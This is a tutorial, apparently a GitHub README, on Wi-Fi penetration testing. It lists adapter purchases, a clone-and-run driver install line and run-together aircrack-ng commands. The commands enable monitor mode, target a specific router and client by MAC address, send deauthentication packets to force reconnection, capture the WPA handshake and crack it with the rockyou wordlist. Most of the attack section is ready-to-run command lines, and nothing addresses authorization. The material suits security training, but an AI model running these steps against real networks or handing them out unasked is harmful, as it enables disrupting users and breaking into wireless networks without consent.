- What is Wi-Fi Pentesting. Why is it So Important ?
- Requirements
- Recommended Products
- Install Wi-fi Drivers
- Basics
- Scan Local Area WiFi networks.
- Deauthenticate Attack
- Capture Handshake file.
- Crack handshake using aircrack.
- Crack handshake using John/Hashcat.
- WhiteListing Mac
Wireless penetration testing is a part of network penetration testing (NPT). This is a Security assessment process focused on Identifying vulnerabilities and reviewing general security tweaks in Network. Wireless pentesting is crucial for securing these networks against unauthorized access, data theft, and other cyber threats.
An attacker can easily spoof and view other users' data within the network, perform various attacks to disrupt it, and spread different types of malware, such as worms, to infect the entire network.
- 2.4g,5g
- Monitor Mode
- Packet Injection
- kali
- Parrot
This adapter has a Realtek RTL8821AU Chipset. It will cost u βΉ1,100 or maybe less. it have a good range and It support in linux community and has driver for Kali linux, Parrot OS ..etc Archer T2U Plus is on sale under 1000 INR, which is a very affordable price and it too good in my opinion for Beginners in Pentesting.
πAmazon
πFlipkart
πAC1300 T3U
If you donβt have any budget concerns,you can go for this Alfa WiFi adapter, which costs around 4-10k depending on sales or market prices. They have more range
πAC1200
πAC1900
git clone https://github.com/Esther7171/WiFi-Pentesting && cd WiFi-Pentesting && chmod +x install.sh && ./install.sh- This Script will automaticall install Drivers kali as well External Wifi adapters.
The First this is to do Recorganize your wireless adapater name according to your os
- In kali the Default name is
wlan0, If you have 2 wifi adapter connected at same time it will showwlan1
First you need adapter who's support Monitor mode && packet injection if u using this TP-link T2U plus. So ur ready
sudo sudo
su rootiwconfig
airmon-ng check kill
- wlan0 => interface name .
- WIFI@REALTEK => Is wlan0 nickname u can use both but reccommended wlan0.
- if u have already connected to wifi sometime it show wlan1 or wlan2 rather than wlna0 (in case u have 2 adpater 1 for wifi and second to attack)
ifconfig wlan0 downiwconfig wlan0 mode managed ifconfig wlan0 upiwconfig 
airmon-ng start wlan0 airodump-ng wlan0 
- Copy bssid ofnetwork u like (bssid = mac address show on first row)
- also note the ch (channel number of same router)
-
--bssid => whom u going to attack
-
--channel => to give channel number if it or use [(-c) for channel but sometime it didn't work well ]
-
station => is the device connectedto router.
-
--write => to creat a file where my handshake store
airodump-ng wlan0 --bssid --channel --write /path/Meow.txtairodump-ng wlan0 --bssid -c -w /path/Meow.txtairodump-ng wlan0 --bssid 3C:46:45:1D:5D:31 --channel 11 -w /home/death/Meow.txt
- aireplay-ng is powerfull we using itfor deauth people and capture handshake when they try to reconnect.
- -a => router mac addrs.
- -c => device connected with router we going to deauthenticate.
- --deauth / -0 => to send number of deauth packeges.
aireplay-ng wlan0 -a -c --deauth 10aireplay-ng wlan0 -a <bssid> -c <station> -0 <number of packages>aireplay-ng wlan0 -a 3C:46:45:1D:5D:31 -c D4:36:89:A4:7R:29 --deauth 10aireplay-ng wlan0 -a <bssid> -0 <deauth n.o packages>- .cap is the file fo capture handshake . In my case is Meow.txt.cap
- so we going to crack it by aircrack-ng with wordlists.
- -w to give wordlist.
- u got so many file but we need .cap file where handshake stored.
- if it not deauth another device.
- gzip -d /usr/share/wordlist/rockyou.txt (if it not)
aircrack-ng Meow.txt.cap -w /usr/share/rockyou.txt
- when it will crack it shou the password.